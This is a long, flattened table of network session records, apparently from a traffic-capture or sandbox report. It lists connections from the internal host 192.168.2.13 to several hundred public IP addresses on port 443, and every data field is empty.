                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11460192.168.2.1354852212.161.67.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11461192.168.2.1342662176.153.146.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11462192.168.2.1340188213.201.243.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11463192.168.2.133404859.101.107.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11464192.168.2.1341684182.40.215.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11465192.168.2.134253888.242.54.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11466192.168.2.1345010177.172.254.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11467192.168.2.1336916150.15.184.16443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11468192.168.2.13578469.17.184.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11469192.168.2.1358240150.202.180.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11470192.168.2.1356170217.217.2.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11471192.168.2.135396052.183.6.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11472192.168.2.1341728168.143.116.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11473192.168.2.135758049.135.156.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11474192.168.2.1354324140.249.170.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11475192.168.2.134838642.172.49.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11476192.168.2.135134663.138.94.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11477192.168.2.134466091.160.128.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11478192.168.2.1346762154.36.224.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11479192.168.2.134695427.207.10.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11480192.168.2.1351196103.184.50.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11481192.168.2.1341336141.218.229.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11482192.168.2.1341718147.169.220.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11483192.168.2.1355846119.36.55.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11484192.168.2.1348244207.21.76.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11485192.168.2.1342030153.181.238.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11486192.168.2.1357886217.251.34.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11487192.168.2.1357062111.18.215.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11488192.168.2.134786088.137.158.96443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11489192.168.2.1352242183.104.234.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11490192.168.2.1352578117.233.170.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11491192.168.2.1360486219.230.169.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11492192.168.2.1351690187.9.3.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11493192.168.2.1339956167.175.16.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11494192.168.2.134311043.132.230.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11495192.168.2.134083492.37.191.167443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11496192.168.2.1357606218.114.23.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11497192.168.2.1344042110.214.3.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11498192.168.2.1354082179.2.200.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11499192.168.2.134728490.84.92.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11500192.168.2.134412472.76.226.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11501192.168.2.1335170201.126.254.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11502192.168.2.1359356152.119.176.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11503192.168.2.1335380173.72.83.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11504192.168.2.1355710120.207.1.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11505192.168.2.134468280.145.210.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11506192.168.2.134125469.134.196.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11507192.168.2.1351380216.228.0.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11508192.168.2.134712267.4.185.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11509192.168.2.134410481.52.130.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11510192.168.2.1347726141.97.138.223443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11511192.168.2.134435836.243.45.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11512192.168.2.1348262151.101.134.53443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11513192.168.2.133592676.86.242.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11514192.168.2.1347368135.200.9.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11515192.168.2.135476427.17.125.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11516192.168.2.1332900168.0.111.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11517192.168.2.134035654.28.155.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11518192.168.2.135610896.90.17.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11519192.168.2.1340844195.1.141.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11520192.168.2.1352162218.0.61.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11521192.168.2.1359524111.49.176.49443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11522192.168.2.134689871.101.251.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11523192.168.2.1359224200.172.4.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11524192.168.2.1358620101.222.190.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11525192.168.2.134281072.30.72.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11526192.168.2.1343586106.208.171.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11527192.168.2.133712665.168.148.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11528192.168.2.136072648.161.246.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11529192.168.2.1353120177.106.17.133443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11530192.168.2.1341082109.68.162.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11531192.168.2.1353138106.149.42.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11532192.168.2.1355774222.114.131.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11533192.168.2.134434494.55.56.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11534192.168.2.1341200222.175.42.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11535192.168.2.134032072.1.29.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11536192.168.2.1335192198.23.203.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11537192.168.2.1347924194.7.159.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11538192.168.2.134767498.203.254.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11539192.168.2.134410489.18.160.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11540192.168.2.1345432180.54.69.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11541192.168.2.1360258191.86.105.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11542192.168.2.133802250.5.0.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11543192.168.2.1355440116.57.57.176443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11544192.168.2.1357540175.125.149.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11545192.168.2.134208252.153.204.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11546192.168.2.135885644.132.162.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11547192.168.2.135046477.37.56.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11548192.168.2.1355660146.240.50.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11549192.168.2.1345240121.248.192.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11550192.168.2.135564473.92.74.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11551192.168.2.133764682.103.44.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11552192.168.2.133459843.23.194.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11553192.168.2.134163482.109.147.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11554192.168.2.133993051.140.101.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11555192.168.2.135318236.153.99.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11556192.168.2.133499031.64.121.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11557192.168.2.1359736176.149.83.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11558192.168.2.1337484169.12.125.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11559192.168.2.1333472141.154.160.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11560192.168.2.133502845.80.232.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11561192.168.2.1359378164.128.212.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11562192.168.2.134333066.171.167.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11563192.168.2.1341636173.105.104.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11564192.168.2.133981013.48.98.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11565192.168.2.134050084.99.240.199443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11566192.168.2.133529486.165.159.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11567192.168.2.135824641.177.243.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11568192.168.2.1338054140.192.3.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11569192.168.2.1352760114.172.184.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11570192.168.2.135778696.248.225.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11571192.168.2.134448297.233.142.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11572192.168.2.1332966184.183.16.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11573192.168.2.135940889.106.110.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11574192.168.2.134629243.199.70.153443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11575192.168.2.1353630118.208.79.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11576192.168.2.1345864123.11.108.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11577192.168.2.133722059.71.144.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11578192.168.2.135302236.11.67.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11579192.168.2.134467814.117.144.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11580192.168.2.134876465.180.15.1443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11581192.168.2.1358896143.33.208.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11582192.168.2.1347854169.252.65.233443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11583192.168.2.134522012.226.30.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11584192.168.2.1339512219.214.197.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11585192.168.2.1350894212.47.217.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11586192.168.2.1343408179.23.68.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11587192.168.2.135441277.30.113.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11588192.168.2.135650075.95.138.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11589192.168.2.1338462200.95.186.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11590192.168.2.134705061.69.129.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11591192.168.2.1344738123.188.191.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11592192.168.2.1355712150.152.218.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11593192.168.2.135227095.104.171.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11594192.168.2.1352984189.179.58.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11595192.168.2.1344132159.86.119.204443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11596192.168.2.135713870.174.244.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11597192.168.2.1345268218.225.170.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11598192.168.2.1353382121.76.216.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11599192.168.2.135561482.83.15.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11600192.168.2.1354286136.190.15.68443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11601192.168.2.135311477.143.159.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11602192.168.2.1343942117.103.132.20443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11603192.168.2.1338448131.203.241.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11604192.168.2.1336482129.238.226.162443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11605192.168.2.1355718113.255.91.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11606192.168.2.1353702216.151.185.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11607192.168.2.13580528.177.211.242443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11608192.168.2.1347220211.222.239.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11609192.168.2.1347008129.71.88.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11610192.168.2.136009285.25.50.218443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11611192.168.2.134939865.194.249.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11612192.168.2.13586444.80.66.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11613192.168.2.1339648123.2.198.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11614192.168.2.1333554150.74.5.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11615192.168.2.135425057.214.188.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11616192.168.2.134484075.113.188.226443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11617192.168.2.1341320204.125.209.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11618192.168.2.134664275.22.19.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11619192.168.2.1341706213.146.126.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11620192.168.2.133881889.228.147.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11621192.168.2.1357814105.189.155.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11622192.168.2.134242057.211.8.38443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11623192.168.2.135958060.208.52.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11624192.168.2.1338708156.46.30.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11625192.168.2.136030877.127.136.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11626192.168.2.1345302130.56.124.166443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11627192.168.2.1356036187.18.48.180443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11628192.168.2.135721232.57.107.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11629192.168.2.1339786163.186.254.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11630192.168.2.1333178116.37.76.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11631192.168.2.133447639.226.160.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11632192.168.2.134124634.239.136.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11633192.168.2.1353020113.166.178.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11634192.168.2.135463665.63.177.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11635192.168.2.1343784161.231.222.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11636192.168.2.135574659.254.241.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11637192.168.2.1356680114.248.167.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11638192.168.2.1356540174.118.33.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11639192.168.2.1335576105.64.38.240443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11640192.168.2.133490672.3.241.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11641192.168.2.1348506140.148.247.217443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11642192.168.2.1341522111.84.102.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11643192.168.2.1353810208.101.211.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11644192.168.2.1334806171.223.62.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11645192.168.2.134066877.139.67.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11646192.168.2.1356252111.42.193.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11647192.168.2.1350512202.191.250.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11648192.168.2.1356960199.59.28.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11649192.168.2.1337332132.177.187.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11650192.168.2.1356508107.54.208.83443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11651192.168.2.134530292.145.136.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11652192.168.2.1350584197.41.10.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11653192.168.2.1340044161.1.20.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11654192.168.2.1340622188.41.118.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11655192.168.2.135367276.127.215.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11656192.168.2.1350506202.200.66.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11657192.168.2.135044693.36.124.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11658192.168.2.13373362.155.128.11443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11659192.168.2.134144219.157.62.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11660192.168.2.1354992121.85.147.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11661192.168.2.1342956170.99.40.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11662192.168.2.134483266.7.19.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11663192.168.2.1351402155.208.137.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11664192.168.2.1356182188.57.215.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11665192.168.2.1343026188.42.180.109443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11666192.168.2.1357982156.191.159.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11667192.168.2.135154627.4.220.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11668192.168.2.1339950223.48.234.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11669192.168.2.133569825.122.59.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11670192.168.2.1342386145.120.160.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11671192.168.2.1349208209.218.185.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11672192.168.2.1344316160.78.138.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11673192.168.2.1343690172.89.83.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11674192.168.2.134387872.84.166.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11675192.168.2.136002088.74.118.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11676192.168.2.135782059.232.13.143443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11677192.168.2.135295438.72.181.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11678192.168.2.135604438.4.200.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11679192.168.2.1352360188.233.218.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11680192.168.2.1338656179.71.86.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    11681192.168.2.1348660197.170.219.51443
